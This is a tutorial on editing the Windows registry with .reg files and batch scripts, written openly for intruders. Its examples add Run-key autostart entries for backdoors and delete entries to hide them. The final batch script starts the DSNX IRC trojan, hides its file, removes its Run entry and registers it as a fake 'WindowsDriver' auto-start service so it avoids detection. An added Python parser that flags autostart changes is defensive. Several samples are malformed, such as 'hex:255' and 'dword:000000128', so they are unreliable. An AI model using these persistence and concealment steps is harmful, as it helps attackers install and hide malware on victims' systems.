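During an intrusion, specific registry keys and values are often manipulated to achieve a particular goal, for example deleting the leftover values under Run in order to hide a backdoor or trojan, or creating a service to load a backdoor. Of course, we also modify the registry to harden a system or to change some system property. All of this requires some understanding of registry operations. Below we first learn how to use .REG files to operate on the registry. (We can generate a REG file with a batch script.)
The common registry operations are create, modify, and delete.
1. Create
There are two kinds of creation. One is creating a subkey (Subkey).
We create a file with the following contents: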
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
Then run the script, and you have created a subkey named "hacker" under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.
The other kind is creating a value name.
This file format is the typical one, identical to the format of files you export from the registry. The contents are as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"="C:\\WINNT\\system32\\door.exe"
"Autodos"=dword:00000002
This creates three values under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]: Invader, Door, and Autodos.
Invader is of type "String Value"
Door is of type "REG SZ Value"
Autodos is of type "DWORD Value"
2. Modify
Modifying is comparatively simple: export the item you need to change, edit it in Notepad, and then import it (regedit /s).
3. Delete
First, let's look at deleting a value name. We create a file like the following:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
Run the script, and "Ex4rch" under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] is deleted.
Now let's look at deleting a subkey. We create a script like the following:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Run the script, and [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] has been deleted.
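From the defender's side, the same syntax can be checked before a .reg file is imported. The following Python code is an added example, not part of the original page: it parses .reg text into the four operations described above and reports those that touch the autostart keys this page names. The function names and the sample file are constructed for illustration.

```python
import re

# Autostart keys named on this page (Run, RunOnce, RunServices, "Runexec").
AUTORUN = re.compile(r"\\CurrentVersion\\Run(Once|Services|exec)?$", re.I)
KEY_RE = re.compile(r"^\[(-?)(.+)\]$")                         # [key] or [-key]
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")\s*=\s*(.*)$')   # "name"=data

# Constructed sample that combines the four operations shown above.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Door"="C:\\WINNT\\system32\\door.exe"
"Ex4rch"=-

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
'''

def parse_reg(text):
    """Return (operation, key, value_name, data) for every line that changes something."""
    ops, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "Windows Registry Editor", "REGEDIT4")):
            continue
        m = KEY_RE.match(line)
        if m:
            deleting, key = bool(m.group(1)), m.group(2)
            ops.append(("delete_key" if deleting else "create_key", key, None, None))
            if deleting:
                key = None  # nothing can be set under a key that was just removed
            continue
        m = VALUE_RE.match(line)
        if m and key:
            name = m.group(1) if m.group(1) == "@" else m.group(1)[1:-1]
            data = m.group(2).strip()
            ops.append(("delete_value" if data == "-" else "set_value", key, name, data))
        # Continuation lines of multi-line hex data match neither pattern and are skipped.
    return ops

def autorun_findings(text):
    """Operations that add, change or remove entries in an autostart key."""
    return [op for op in parse_reg(text) if AUTORUN.search(op[1])]

if __name__ == "__main__":
    for op in autorun_findings(SAMPLE):
        print(op)
```

A value deletion (`=-`) or key deletion (`[-...]`) under an autostart key is as worth reviewing as an addition, since the page describes it as a way to remove traces of a startup entry.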
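By this point you have basically mastered .reg files. The goal now is to create .reg files with specific contents from a batch script. Remember that, as we said earlier, the redirection operators make it easy to create files of a specific type.
sample1: As in the example above, suppose you want to generate the following registry file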
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
All you need is this:
@echo Windows Registry Editor Version 5.00>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"="C:\\WINNT\\system32\\door.exe">>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
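sample2:
When we use some older trojans today, they may create a value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Runonce, Runservices, Runexec)] in the registry to start the trojan automatically. But this easily exposes the path of the trojan program, which leads to the trojan being detected and removed. By comparison, registering the trojan program as a system service is somewhat safer. Below, the already configured IRC trojan DSNX (named windrv32.exe) is used as the example.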
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [Deletes DSNX's startup entry in the registry, uses sc.exe to register it as a critical system service while setting its attributes to hidden and read-only, and configures it to start automatically]
@REM Isn't that safer ^_^.